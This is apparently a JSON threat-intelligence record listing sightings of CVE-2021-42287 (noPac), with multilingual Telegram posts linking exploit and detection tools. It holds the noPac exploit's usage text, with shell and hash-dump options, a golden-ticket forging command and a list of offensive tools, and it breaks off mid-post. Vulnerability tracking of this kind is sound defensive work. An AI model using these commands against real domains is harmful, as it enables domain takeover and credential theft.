{"vulnerability": "CVE-2021-42287", "sightings": [{"uuid": "810a8f56-7ae5-4083-ada5-423155d53eb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "MISP/99138053-ae5d-4bcf-b2f8-0954edb204bc", "content": "", "creation_timestamp": "2022-11-01T20:54:34.000000Z"}, {"uuid": "6f391940-386e-449d-8106-628022d5fdb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "MISP/095ab3f1-cbae-4b5c-8534-34d42a458aa5", "content": "", "creation_timestamp": "2022-05-12T16:19:54.000000Z"}, {"uuid": "8a13b9b6-d88b-4d70-abd9-3afb4a4e4c52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "MISP/aaf97b2c-ad16-4ce6-928a-a440112d0fd3", "content": "", "creation_timestamp": "2024-09-16T19:13:31.000000Z"}, {"uuid": "0430372c-e935-473f-a373-ec14d8aa76e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "008070c8-83f7-4a61-84f3-aa00790c9efa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971507", "content": "", "creation_timestamp": "2024-12-24T20:30:21.498791Z"}, {"uuid": "d023e5f6-36ec-496f-9d9f-a8eedd74f84f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": 
"seen", "source": "https://poliverso.org/objects/0477a01e-7358d820-9e7295ee585c5d83", "content": "", "creation_timestamp": "2025-04-30T17:58:26.900498Z"}, {"uuid": "12459bb7-94c0-41c3-9182-bb9fd9d96a1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:32.000000Z"}, {"uuid": "2f7325b3-1b12-4ec8-9e2a-84f01f6f5f11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "09a7ba63-8182-47c5-9efc-f85bd4323d84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1116", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \nURL\uff1ahttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2021-12-16T14:49:25.000000Z"}, {"uuid": "198f7c92-0e57-44b3-bc63-fccd6baf788d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-42287", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/5cd55247-d2e3-4d95-8e4c-62b0be09855f", "content": "", "creation_timestamp": "2026-02-02T12:27:52.455694Z"}, {"uuid": "d30c66e1-3485-4ae7-88ff-a6d538e9742d", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/habr_com_news/2245", "content": "\u200bMicrosoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e \u0431\u0430\u0433\u0430\u0445 Active Directory, \u0441 \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u0435\u043d \u0437\u0430\u0445\u0432\u0430\u0442 \u0434\u043e\u043c\u0435\u043d\u0430 Windows\n\n9 \u043d\u043e\u044f\u0431\u0440\u044f 2021 \u0433\u043e\u0434\u0430 \u0431\u044b\u043b\u0438 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u044b 2 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: CVE-2021-42278 \u0438 CVE-2021-42287, \u0430 12 \u0434\u0435\u043a\u0430\u0431\u0440\u044f \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430 \u0441\u0445\u0435\u043c\u0430 \u0432\u0437\u043b\u043e\u043c\u0430. \u042d\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0432\u044f\u0437\u043a\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0440\u043e\u043b\u044c \u0434\u043e\u043c\u0435\u043d-\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0434\u043e\u043c\u0435\u043d\u043e\u043c. 
20 \u0434\u0435\u043a\u0430\u0431\u0440\u044f Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u043f\u043e \u043d\u0430\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432.\n\n#Microsoft #Windows #\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c", "creation_timestamp": "2021-12-22T04:19:44.000000Z"}, {"uuid": "27134e2c-e389-420a-8bf1-da4fe7ddb26a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1242", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDetection script for CVE-2021-42278 and CVE-2021-42287\nURL\uff1ahttps://github.com/cybersecurityworks553/noPac-detection", "creation_timestamp": "2021-12-27T13:13:28.000000Z"}, {"uuid": "cebda512-f824-4bb4-a26c-c35a6fc1fe72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1009", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \nURL\uff1ahttps://github.com/Ridter/noPac", "creation_timestamp": "2021-12-13T10:29:48.000000Z"}, {"uuid": "8e8040c6-b666-498f-85e4-e42a9864ea4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 
"CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/952", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-42287/CVE-2021-42278 Scanner &amp; Exploiter.\nURL\uff1ahttps://github.com/cube0x0/noPac", "creation_timestamp": "2021-12-11T19:44:35.000000Z"}, {"uuid": "1c07bdc6-fbca-492a-9fee-137bcd241e85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1021", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploiting CVE-2021-42278 and CVE-2021-42287\nURL\uff1ahttps://github.com/waterrr/noPac", "creation_timestamp": "2021-12-13T15:27:32.000000Z"}, {"uuid": "0266fd59-5ff8-4625-8d24-77cf9e1be291", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/secmedia/81", "content": "\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u043e \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 ( CVE-2021-42287 \u0438 CVE-2021-42278 ) \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432 Active Directory, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 
\u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0434\u043e\u043c\u0435\u043d\u0430\u043c\u0438 Windows.", "creation_timestamp": "2021-12-22T14:51:36.000000Z"}, {"uuid": "e4f606f3-8998-4813-93ad-f3c45dc27e3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/cKure/8415", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 noPac: CVE-2021-42287/CVE-2021-42278 Scanner &amp; Exploiter. Yet another low effort domain user to domain admin exploit.\nIf a Domain Controller is vulnerable it will return a TGT without a PAC, all eyes on small size tickets.\n\nhttps://github.com/cube0x0/noPac", "creation_timestamp": "2021-12-13T18:21:34.000000Z"}, {"uuid": "28e9ed5b-6232-4c14-a96a-0ff0b9658fd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/ggfcvj/3004", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 
\u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T08:37:30.000000Z"}, {"uuid": "f2876cce-d4c8-4982-b6f7-b6d72b75409c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/1108", "content": "noPac - Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User\nhttp://www.kitploit.com/2022/09/nopac-exploiting-cve-2021-42278-and-cve.html", "creation_timestamp": "2022-09-06T14:17:31.000000Z"}, {"uuid": "21609afe-3ff3-41c0-8f27-7f19e152459e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/b4ckc0nn3ct/31", "content": "#activedirectory #ad #pentest #windows\nSAM THE ADMIN\n\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435\n\u0423\u0441\u043b\u043e\u0432\u0438\u044f \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0438:\n1. \u041e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u043f\u0430\u0442\u0447\u0430 \u043d\u0430 CVE-2021-42278\n2. 
\u0423\u0447\u0435\u0442\u043a\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0441 \u043f\u0440\u0430\u0432\u043e\u043c \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u043e\u0432 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\n\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n\n\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c Pachine\n\u0410\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b:\nnoPac.py\nnoPac.exe\nsam-the-admin", "creation_timestamp": "2023-05-21T04:48:36.000000Z"}, {"uuid": "a5d903ac-0fa2-4cd0-8aea-f23136e83730", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/NinjaSec/348", "content": "Offensive Security (for exams like OSCP, OSWE, OSEP, etc.). \n\n\nPowerful Offensive Security Tools\n\n1. DeathStar \u2013 Automated AD privilege escalation\nhttps://github.com/byt3bl33d3r/DeathStar\n\n\n2. Frogger \u2013 Lateral movement visualizer for BloodHound\nhttps://github.com/FSecureLABS/Frogger\n\n\n3. InSpy \u2013 LinkedIn-based OSINT tool for target enumeration\nhttps://github.com/leapsecurity/InSpy\n\n\n4. NoPac-Tool \u2013 Exploits CVE-2021-42287 &amp; CVE-2021-42278 (Kerberos)\nhttps://github.com/Ridter/noPac\n\n\n5. LaZagne \u2013 Credential recovery from local machines\nhttps://github.com/AlessandroZ/LaZagne\n\n\n6. Egress-Assess \u2013 Test outbound firewall egress rules\nhttps://github.com/FortyNorthSecurity/Egress-Assess\n\n\n7. SessionGopher \u2013 Gathers saved session data\nhttps://github.com/fireeye/SessionGopher\n\n\n8. 
RustScan \u2013 Lightning-fast modern port scanner\nhttps://github.com/RustScan/RustScan\n\n\n9. Grouper2 \u2013 Active Directory ACL auditing\nhttps://github.com/l0ss/Grouper2\n\n\n10. ADACLScanner \u2013 Find misconfigured ACLs in AD\nhttps://github.com/canix1/ADACLScanner\n\n\n11. CredNinja \u2013 Brute-forces AD credentials over SMB\nhttps://github.com/byt3bl33d3r/CredNinja\n\n\n12. PetitPotam \u2013 Coerce NTLM authentication via MS-EFSRPC\nhttps://github.com/topotam/PetitPotam\n\n\n13. ZAP CLI \u2013 Command-line tool for OWASP ZAP automation\nhttps://github.com/Grunny/zap-cli\n\n\n14. Brutespray \u2013 Combines Nmap and Hydra for bruteforcing\nhttps://github.com/x90skysn3k/brutespray\n\n\n15. Chankro \u2013 DLL sideloading helper tool\nhttps://github.com/ivan-sincek/chankro\n\n\n16. 0d1n \u2013 Web application brute-forcing tool\nhttps://github.com/danielmiessler/0d1n\n\n\n17. Silenthound \u2013 BloodHound alternative using .NET\nhttps://github.com/dievus/silenthound\n\n\n18. LDAPDomainDump \u2013 Dumps Active Directory info via LDAP\nhttps://github.com/dirkjanm/ldapdomaindump\n\n\n19. SharpView \u2013 AD enumeration using C# (OPSEC-safe alternative to PowerView)\nhttps://github.com/tevora-threat/SharpView\n\n\n20. SharpHound.ps1 \u2013 Standalone version for stealthier BloodHound collection\nhttps://github.com/BloodHoundAD/BloodHound\n\n\n21. Nishang \u2013 PowerShell for offensive use\nhttps://github.com/samratashok/nishang\n\n\n22. PowerSharpPack \u2013 Collection of PowerShell offensive tools\nhttps://github.com/S3cur3Th1sSh1t/PowerSharpPack\n\n\n23. EvilClippy \u2013 Weaponize MS Office documents\nhttps://github.com/outflanknl/EvilClippy\n\n\n24. PSAttack \u2013 PowerShell attack toolkit\nhttps://github.com/jaredhaight/PSAttack\n\n\n25. 
Praeda \u2013 Collects sensitive info from embedded devices\nhttps://github.com/percx/Praeda\n\n\n#HackersFactory", "creation_timestamp": "2025-06-20T22:08:37.000000Z"}, {"uuid": "bedcdcf6-7919-4123-bc0b-457dee4ecc90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/1110", "content": "Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user  Changed from sam-the-admin (https://github.com/WazeHell/sam-the-admin).\n  Usage  SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain\n\npositional arguments:\n  [domain/]username[:password]\n                        Account used to authenticate to DC.\n\noptional arguments:\n  -h, --help            show this help message and exit\n  --impersonate IMPERSONATE\n                        target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is allowed for delegation to the SPN specified\n  -domain-netbios NETBIOSNAME\n                        Domain NetBIOS name. 
Required if the DC has multiple domains.\n  -target-name NEWNAME  Target computer name, if not specified, will be random generated.\n  -new-pass PASSWORD    Add new computer password, if not specified, will be random generated.\n  -old-pass PASSWORD    Target computer password, use if you know the password of the target you input with -target-name.\n  -ol   d-hash LMHASH:NTHASH\n                        Target computer hashes, use if you know the hash of the target you input with -target-name.\n  -debug                Turn DEBUG output ON\n  -ts                   Adds timestamp to every logging output\n  -shell                Drop a shell via smbexec\n  -no-add               Forcibly change the password of the target computer.\n  -create-child         Current account have permission to CreateChild.\n  -dump                 Dump Hashs via secretsdump\n  -use-ldap             Use LDAP instead of LDAPS\n\nauthentication:\n  -hashes LMHASH:NTHASH\n                        NTLM hashes, format is LMHASH:NTHASH\n  -no-pass              don't ask for password (useful for -k)\n  -k                    Use Kerberos (https://www.kitploit.com/search/label/Kerberos) authentication. Grabs credentials (https://www.kitploit.com/search/label/Credentials) from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line\n  -aesKey hex key       AES key to use for Kerberos Authentication (https://www.kitploit.com/search/label/Authentication) (128 or 256 bits)\n  -dc-host hostname     Hostname of the domain controller (https://www.kitploit.com/search/label/Domain%20Controller) to use. If ommited, the domain part (FQDN) specified in the account parameter will be used\n  -dc-ip ip             IP of the domain controller to use. 
Useful if you can't translate the FQDN.specified in the account parameter will be used\n\nexecute options:\n  -port [destination port]\n                        Destination port to connect to SMB Server\n  -mode {SERVER,SHARE}  mode to use (default SHARE, SERVER needs root!)&lt;   br/&gt;  -share SHARE          share where the output will be grabbed from (default ADMIN$)\n  -shell-type {cmd,powershell}\n                        choose a command processor for the semi-interactive shell\n  -codec CODEC          Sets encoding (https://www.kitploit.com/search/label/Encoding) used (codec) from the target's output (default \"GBK\").\n  -service-name service_name\n                        The name of theservice used to trigger the payload\n\ndump options:\n  -just-dc-user USERNAME\n                        Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch\n  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)\n  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)\n  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account. 
Doesn't apply to -outputfile data\n  -use   r-status          Display whether or not the user is disabled\n  -history              Dump password history, and LSA secrets OldVal\n  -resumefile RESUMEFILE", "creation_timestamp": "2022-09-06T14:17:32.000000Z"}, {"uuid": "9a5a69f9-39b8-40ff-a747-671df20849df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3883", "content": "\ud83c\udfab\u041d\u0435\u043c\u043d\u043e\u0433\u043e \u043e Golden Ticket\ud83c\udfab\n\n\u0418\u0437\u0443\u0447\u0430\u044f \u0440\u0435\u0441\u0443\u0440\u0441\u044b \u043f\u043e \u0442\u0438\u043f\u0443 HackTricks, \u0432\u044b \u043c\u043e\u0433\u043b\u0438 \u043d\u0435\u043e\u0434\u043d\u043e\u043a\u0440\u0430\u0442\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0441\u043f\u043e\u0441\u043e\u0431 \u0432\u044b\u0434\u0430\u0447\u0438 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0437\u043e\u043b\u043e\u0442\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 ticketer.py \u0438\u0437 \u043d\u0430\u0431\u043e\u0440\u0430 Impacket\ud83d\udc69\u200d\ud83d\udcbb:\npython3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser\n\n\u041d\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0432 \u0441\u0435\u0431\u0435 \u0431\u0438\u043b\u0435\u0442 \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043f\u0440\u0438 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u044b \u0443\u0432\u0438\u0434\u0438\u0442\u0435 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443:\n[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been 
revoked)\n\u041e \u0447\u0435\u043c \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u044d\u0442\u0430 \u043e\u0448\u0438\u0431\u043a\u0430? \u0411\u0438\u043b\u0435\u0442 \u0431\u044b\u043b \u043e\u0442\u043e\u0437\u0432\u0430\u043d? \u041d\u043e \u043c\u044b \u0436\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u043e \u0435\u0433\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438!\n\n\u0412\u0441\u044f \u043f\u0440\u0438\u0447\u0438\u043d\u0430 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043a\u0442\u043e-\u0442\u043e \u043d\u0435 \u0441\u043b\u0435\u0434\u0438\u0442 \u0437\u0430 \u043f\u0430\u0442\u0447-\u043d\u043e\u0443\u0442\u0430\u043c\u0438. \u0421 \u043d\u043e\u044f\u0431\u0440\u044f 2021 \u0433\u043e\u0434\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u043d\u0430\u0447\u0430\u043b\u0430 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 KB5008380, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0432\u043e\u0434\u0438\u043b\u043e\u0441\u044c \u0432 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u044d\u0442\u0430\u043f\u043e\u0432. 
\u0415\u0433\u043e \u0446\u0435\u043b\u044c\u044e \u0431\u044b\u043b\u0430 \u043d\u0435\u0439\u0442\u0440\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-42287, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0431\u0435\u0437 \u043e\u0441\u043e\u0431\u044b\u0445 \u0443\u0441\u0438\u043b\u0438\u0439 \u043e\u043b\u0438\u0446\u0435\u0442\u0432\u043e\u0440\u044f\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430, \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u044f\u044f Privilege Attribute Certificate (PAC) Kerberos\ud83d\uddbc\ufe0f\n\n\u0414\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u043d\u0435 \u0432 \u0442\u0435\u043c\u0435:\nPrivilege Attribute Certificate (PAC) \u2014 \u044d\u0442\u043e \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Kerberos, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0445\u0440\u0430\u043d\u0438\u0442 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u043f\u0440\u0438\u043a\u0440\u0435\u043f\u043b\u044f\u0435\u0442\u0441\u044f \u043a \u0431\u0438\u043b\u0435\u0442\u0443 Kerberos, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0443\u044e 
